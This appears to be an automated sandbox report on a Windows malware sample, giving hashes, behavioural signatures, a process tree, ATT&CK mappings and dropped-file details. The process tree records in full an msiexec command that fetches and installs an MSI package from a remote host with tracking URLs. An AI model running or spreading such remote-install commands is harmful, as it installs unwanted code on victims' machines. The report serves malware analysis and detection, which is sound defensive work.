0694e754d16385881fec30cdbcd56bb6b43f6f61792ff152d193503483d79084

General

Target

826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe
Size

1.4MB
MD5

826f248115f40019109fbaae3ef2d034
SHA1

1b927e3c43c2f438ef9697bbbf81b592e1a887f4
SHA256

0694e754d16385881fec30cdbcd56bb6b43f6f61792ff152d193503483d79084
SHA512

6bbbf86b56a2b370acd835ee8aa8d826973718a68387baa484827a4e42cc3134765de1408a9040b6734b879c532d2faf7b35d168dbd650e2c6479dd097bddeb4
SSDEEP

24576:gbHLdyiK2C2D2+gZ97k7oKYaIgz6/rVDbZpsPzsbx6lC8Jsx4BQ7MC:eyis2q+gy6/xDbbkz4x6lC8DQYC

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2916	m4sjhl.exe

Loads dropped DLL 3 IoCs

pid	Process
2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe
2916	m4sjhl.exe
2916	m4sjhl.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2688	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	m4sjhl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2688	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2688	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2688	MSIEXEC.EXE
2688	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2868 wrote to memory of 2916	2868	826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe	30
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31
PID 2916 wrote to memory of 2688	2916	m4sjhl.exe	31

C:\Users\Admin\AppData\Local\Temp\826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\826f248115f40019109fbaae3ef2d034_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Users\Admin\AppData\Local\Temp\m4sjhl.exe
  C:\Users\Admin\AppData\Local\Temp\m4sjhl.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/36175/cdn/slotveg/Slots of Vegas20130912092821.msi" DDC_DID=2006896 DDC_RTGURL=http://www.packagescdn.eu/dl/TrackSetup/TrackSetup.aspx?DID=2006896 DDC_DOWNLOAD_AFFID=12358 DDC_UPDATESTATUSURL=http://196.40.45.218:8080/prism/Lobby.WebServices/Installer.asmx CUSTOMNAME02=trackingID CUSTOMVALUE02=SOV5a3a4e3bbadb7df96b73c66bd0cc27e7 CUSTOMNAME03=NAME CUSTOMNAME04=EMAIL SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="m4sjhl.exe"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is64B1.tmp

Filesize
1KB

MD5
692ef7ec228ebca60f128c5cd5574a5f

SHA1
6c711c78b5458e5d542eb1ca67477f3675f49cfa

SHA256
92896985afde6c3a5266aa1bd87e6691dd7af0d5924299e5418400c16826de1e

SHA512
7bb4a2cf6c13afbb0453c3de1359469f2b0d0bd8985f318493f7788a4f09367faddd3b194a25f3c30f8835c1c7b2870d72eb8aa57686b08c9569dfadf576767b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{7B63541F-E7AA-48CD-8E33-213029524F54}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{7B63541F-E7AA-48CD-8E33-213029524F54}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~649F.tmp

Filesize
5KB

MD5
a8de03d649c1826bca56af0d1332c719

SHA1
7e37044a8dc246aa53ecd8e89c0bd934b2412c29

SHA256
463e43bfd5b27baa462bf69f6a5e5e1121d18ed1da53ccf046503cde87685261

SHA512
9ccee3eeac6093a252da5bb60faac94a85f24e59fd52f4ed7446b8b8525abf67637b51ca47f7113726d4b7cb0e498e63d1ed555532f8f36bd52718bd7f0830db

Download Submit
\Users\Admin\AppData\Local\Temp\m4sjhl.exe

Filesize
1.2MB

MD5
da1b56f1276ea427189e766af9b675dc

SHA1
7bb30718e47d83a55dd12f8b2c8af3f326788d87

SHA256
37cbde50367d3478ff2748443dc70a299770bd1df9f050a08037fd7fc23f370e

SHA512
4a712958139bfb88f921e2f41a3c3a2ccf4b08a783e2cf7d89794d7d20d5e35d766cbb6fba4affa8bfa73b87808761c8cdb86b88e4512d05d8c0b9f6c5764903

Download Submit

Analysis

Sharing